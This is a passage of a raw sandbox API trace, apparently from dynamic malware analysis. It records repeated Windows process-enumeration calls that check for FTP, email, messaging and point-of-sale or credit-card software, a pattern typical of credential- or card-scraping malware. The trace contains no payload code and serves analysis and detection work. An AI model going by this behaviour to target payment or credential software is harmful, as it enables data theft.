lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0299.738] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0299.741] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0299.743] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0299.748] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0299.751] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0299.753] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0299.756] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0299.758] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0299.893] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0299.896] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0299.898] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0299.901] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0299.905] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0299.908] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0299.910] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0299.913] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0299.915] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0299.919] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0299.922] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0299.924] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0299.926] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0299.928] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0299.931] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0300.310] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0300.312] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0300.314] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0300.316] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0300.318] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0300.320] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0300.321] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0300.328] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0300.330] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0300.332] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0300.334] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0300.335] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0300.337] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0300.342] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0300.344] CloseHandle (hObject=0x227c) returned 1 [0300.344] Sleep (dwMilliseconds=0x64) [0300.467] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0300.479] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0300.483] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0300.485] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0300.487] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.489] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0300.490] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0300.492] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0300.493] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0300.498] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0300.500] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.502] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.503] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0300.505] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.507] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.508] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.560] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.600] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.602] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.607] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.609] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0300.611] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0300.613] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0300.615] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.617] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0300.622] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0300.624] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0300.625] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0300.627] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0300.628] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0300.630] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0300.631] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0300.633] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0300.634] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0300.655] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0300.657] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0300.659] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0300.660] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0300.662] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0300.663] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0300.665] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0300.667] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0300.671] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0300.673] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0300.675] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0300.677] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0300.679] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, 